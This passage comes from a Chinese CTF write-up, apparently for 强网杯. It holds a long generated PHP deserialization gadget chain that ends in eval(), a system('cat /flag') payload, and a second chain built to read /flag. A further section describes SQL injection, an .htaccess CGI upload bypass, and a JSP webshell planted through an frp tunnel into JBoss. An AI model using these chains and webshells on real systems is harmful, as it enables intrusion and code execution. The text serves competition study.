if (method_exists($this->u0ma7My, 's7F8zs')) {
$this->u0ma7My->s7F8zs($ezg5D);
}
if (method_exists($this->u0ma7My, 'nhN1A7')) {
$this->u0ma7My->nhN1A7($ezg5D);
}
}
}
class sNyaIR
{
public $vfg35pV;
public function s7F8zs($aK86k)
{
for ($i = 0; $i < 39; $i++) {
$aFU8Tr = $aK86k;
}
if (method_exists($this->vfg35pV, 'WfmYgs')) {
$this->vfg35pV->WfmYgs($aK86k);
}
if (method_exists($this->vfg35pV, 'DZP5my')) {
$this->vfg35pV->DZP5my($aK86k);
}
}
}
class L4F0o0
{
public $aa1YDXx;
public function DZP5my($cRuqt)
{
if (7225 > 51042) {
$cRuqt = $cRuqt . 'LPfyp';
}
if (method_exists($this->aa1YDXx, 'sFvdtP')) {
$this->aa1YDXx->sFvdtP($cRuqt);
}
if (method_exists($this->aa1YDXx, 'mG4Y4e')) {
$this->aa1YDXx->mG4Y4e($cRuqt);
}
}
}
class zrVAgB
{
public $lZCvTCa;
public function mG4Y4e($pGHYR)
{
for ($i = 0; $i < 5; $i++) {
$aBwmWS = $pGHYR;
}
$this->lZCvTCa->ruF6g1($pGHYR);
}
}
class DcdRXA
{
public $cO81cFh;
public function ruF6g1($NdPP4)
{
$this->wqFxW = "TdA1L";
$this->cO81cFh->DOqAB2($NdPP4);
}
}
class R9VkbV
{
public $VqvWTUF;
public function DOqAB2($FtEHV)
{
for ($i = 0; $i < 24; $i++) {
$ad1M6I = $FtEHV;
}
$this->VqvWTUF->dgzpEV($FtEHV);
}
}
class m2oL58
{
public $cgQkf6v;
public function dgzpEV($XSe7m)
{
if (20744 > 30587) {
$XSe7m = $XSe7m . 'ATBgs';
}
if (method_exists($this->cgQkf6v, 'x62I2C')) {
$this->cgQkf6v->x62I2C($XSe7m);
}
if (method_exists($this->cgQkf6v, 'K8gDPQ')) {
$this->cgQkf6v->K8gDPQ($XSe7m);
}
}
}
class CIecTW
{
public $FS7bzT6;
public function x62I2C($M1qEC)
{
$this->vLssi = "K9Muh";
if (method_exists($this->FS7bzT6, 'yXQG7A')) {
$this->FS7bzT6->yXQG7A($M1qEC);
}
if (method_exists($this->FS7bzT6, 'yRo7eg')) {
$this->FS7bzT6->yRo7eg($M1qEC);
}
}
}
class bSaDnb
{
public $uklXnxo;
public function yXQG7A($GWO3a)
{
if (51752 > 21391) {
$GWO3a = $GWO3a . 'cpuNP';
}
$this->uklXnxo->kuHG2i($GWO3a);
}
}
class PTCzfW
{
public $ybeKnmY;
public function kuHG2i($nW6E9)
{
if (37307 > 17647) {
$nW6E9 = $nW6E9 . 'RlYLu';
}
if (method_exists($this->ybeKnmY, 'VT42cE')) {
$this->ybeKnmY->VT42cE($nW6E9);
}
if (method_exists($this->ybeKnmY, 'dBbWYC')) {
$this->ybeKnmY->dBbWYC($nW6E9);
}
}
}
class DEGn5X
{
public $tpdAnk7;
public function VT42cE($PnvsO)
{
$this->FKGiG = "hg0tc";
if (method_exists($this->tpdAnk7, 'aAoOwi')) {
$this->tpdAnk7->aAoOwi($PnvsO);
}
if (method_exists($this->tpdAnk7, 'EtmH03')) {
$this->tpdAnk7->EtmH03($PnvsO);
}
}
}
class vzURHs
{
public $t43nVRQ;
public function aAoOwi($Pe6pd)
{
for ($i = 0; $i < 1; $i++) {
$aQBlnL = $Pe6pd;
}
if (method_exists($this->t43nVRQ, 'Lgtm7z')) {
$this->t43nVRQ->Lgtm7z($Pe6pd);
}
if (method_exists($this->t43nVRQ, 'vHOZvc')) {
$this->t43nVRQ->vHOZvc($Pe6pd);
}
}
}
class y93b0L
{
public $vv0iwPE;
public function Lgtm7z($qoKDy)
{
if (58621 > 27135) {
$qoKDy = $qoKDy . 'oDbtW';
}
eval($qoKDy);
}
}

$test = new HdeuDP();
$test->ErltTLc = new vwR9vW();
$test->ErltTLc->sQ9iP8M = new sg2RxY();
$test->ErltTLc->sQ9iP8M->qsDrtNG = new M4LuGl();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66 = new rHZfcN();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg = new gxx6av();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it = new L0UPus();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC = new K7VNu5();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC->lB9b5G5 = new T5mH7X();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC->lB9b5G5->xCsxdh5 = new lwmggy();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC->lB9b5G5->xCsxdh5->FigpmfG = new X1Bmbb();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC->lB9b5G5->xCsxdh5->FigpmfG->u0ma7My = new sNyaIR();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC->lB9b5G5->xCsxdh5->FigpmfG->u0ma7My->vfg35pV = new L4F0o0();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC->lB9b5G5->xCsxdh5->FigpmfG->u0ma7My->vfg35pV->aa1YDXx = new zrVAgB();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC->lB9b5G5->xCsxdh5->FigpmfG->u0ma7My->vfg35pV->aa1YDXx->lZCvTCa = new DcdRXA();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC->lB9b5G5->xCsxdh5->FigpmfG->u0ma7My->vfg35pV->aa1YDXx->lZCvTCa->cO81cFh = new R9VkbV();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC->lB9b5G5->xCsxdh5->FigpmfG->u0ma7My->vfg35pV->aa1YDXx->lZCvTCa->cO81cFh->VqvWTUF = new m2oL58();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC->lB9b5G5->xCsxdh5->FigpmfG->u0ma7My->vfg35pV->aa1YDXx->lZCvTCa->cO81cFh->VqvWTUF->cgQkf6v = new CIecTW();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC->lB9b5G5->xCsxdh5->FigpmfG->u0ma7My->vfg35pV->aa1YDXx->lZCvTCa->cO81cFh->VqvWTUF->cgQkf6v->FS7bzT6 = new bSaDnb();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC->lB9b5G5->xCsxdh5->FigpmfG->u0ma7My->vfg35pV->aa1YDXx->lZCvTCa->cO81cFh->VqvWTUF->cgQkf6v->FS7bzT6->uklXnxo = new PTCzfW();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC->lB9b5G5->xCsxdh5->FigpmfG->u0ma7My->vfg35pV->aa1YDXx->lZCvTCa->cO81cFh->VqvWTUF->cgQkf6v->FS7bzT6->uklXnxo->ybeKnmY = new DEGn5X();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC->lB9b5G5->xCsxdh5->FigpmfG->u0ma7My->vfg35pV->aa1YDXx->lZCvTCa->cO81cFh->VqvWTUF->cgQkf6v->FS7bzT6->uklXnxo->ybeKnmY->tpdAnk7 = new vzURHs();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC->lB9b5G5->xCsxdh5->FigpmfG->u0ma7My->vfg35pV->aa1YDXx->lZCvTCa->cO81cFh->VqvWTUF->cgQkf6v->FS7bzT6->uklXnxo->ybeKnmY->tpdAnk7->t43nVRQ = new y93b0L();

echo serialize($test);

过程中添加的多余字符直接用 ?> 绕过

argv=system('cat /flag');?>

[强网先锋]赌徒

构造反序列化链读 /flag

1
2
3
4
5
$h = new Start();
$h->name = new Info();
$h->name->file = array('filename' => new Room());
$h->name->file['filename']->a = new Room();
$h->name->file['filename']->a->filename = '/flag';

[强网先锋]寻宝

key1:

image.png

key2:

image.png

分别输入进去就行

EasyWeb

扫目录

http://121.42.242.238/files

image.png

hint.txt

1
2
3
Try to scan 35000-40000 ^_^.
All tables are empty except for the table where the username and password are located
Table: employee

exp.py

1
2
3
import os

os.system("echo 'flag';")

www.zip

1
It's fake.

扫出端口是36842

是登陆页面,注出admin密码

1
2
admin
99f609527226e076d668668582ac4420

.htaccess

1
2
Options +ExecCGI
AddHandler cgi-script .xx

再上传youname.xx

1
2
3
4
5
6
7
#! /bin/sh

echo Content-type: text/html

echo ""

whoami

image.png

根目录有 flag 无权限

127.0.0.1:8006 有 jboss 4.0.2

frp 反代出来传个 jsp 一句话读 flag